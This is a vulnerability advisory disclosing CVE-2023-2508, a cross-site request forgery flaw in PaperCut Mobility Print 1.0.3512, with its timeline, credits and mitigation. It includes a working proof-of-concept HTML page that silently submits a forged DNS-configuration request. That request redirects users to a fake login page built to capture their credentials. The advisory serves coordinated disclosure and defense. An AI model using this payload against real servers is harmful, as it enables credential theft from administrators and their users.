CSRF in PaperCut Mobility Print leads to sophisticated phishing
Summary
| Name | CSRF in PaperCut Mobility Print leads to sophisticated phishing |
| Code name | |
| Product | PaperCut Mobility Print |
| Affected versions | Version 1.0.3512 |
| State | Public |
| Release date | 2023-09-20 |
Vulnerability
| Kind | Cross-site request forgery |
| Rule | |
| Remote | Yes |
| CVSSv3.1 Vector | CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N |
| CVSSv3.1 Base Score | 5.3 |
| Exploit available | Yes |
| CVE ID(s) |
Description
The PaperCut Mobility Print version 1.0.3512 application allows an unauthenticated attacker to perform a CSRF attack on an instance administrator to configure the clients host (in the "configure printer discovery" section). This is possible because the application has no protections against CSRF attacks, like Anti-CSRF tokens, header origin validation, samesite cookies, etc.
Vulnerability
This vulnerability occurs because the application has no protections against CSRF attacks, like Anti-CSRF tokens, header origin validation, samesite cookies, etc.
Exploitation
In this scenario an unauthenticated attacker to perform a CSRF attack on an instance administrator to configure the clients host (in the "configure printer discovery" section).
Then, when the administrator wants to share the link to users so that they can configure their credentials, they are actually sending users to a malicious website that pretends to be the PaperCut NG login, with the goal of exfiltrating the credentials.
exploit.html
<!DOCTYPE html> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html;charset=UTF-8"/> </head> <body> <form action=http://vulnerable.com:9163/dns-config method=POST enctype=text/plain> <input type=hidden name={"mdnsEnabled":false,"searchDomain":"","subnets":[],"currentStep":"","dnsOptionSelected":"","dnsConfigModified":false,"ZoneIndex":0,"AccessibleIP":"","AccessibleHTTPSPort":0,"dnsFreeEnabled":true,"ExternalIPCIDRs":null,"serverAddresses":["192.168.1.8","Retr02332-MacBookPro.local"],"httpsPort":0,"dnsFreeDiscoveryHostname":"localhost:9999/login.html?redirect="," value=x":"x"} /> </form> <script>document.forms[0].submit();</script> </body> </html>
Evidence of exploitation
Our security policy
We have reserved the ID CVE-2023-2508 to refer to this issue from now on.
System Information
-
Version: PaperCut Mobility Print 1.0.3512
-
Operating System: MacOS
Mitigation
An updated version of PaperCut Mobility Print is available at the vendor page.
Credits
The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.
References
Vendor page https://www.papercut.com/
PaperCut Mobility Print server release history https://www.papercut.com/help/manuals/mobility-print/release-history/#mobility-print-server
PaperCut Mobility Print android app release history https://www.papercut.com/help/manuals/mobility-print/release-history/#mobility-print-android-app
Timeline
2023-05-03
Vulnerability discovered.
2023-05-03
Vendor contacted.
2023-05-03
Vendor replied acknowledging the report.
2023-05-08
Vendor Confirmed the vulnerability.
2023-08-22
Vulnerability patched.
2023-09-20
Public Disclosure.
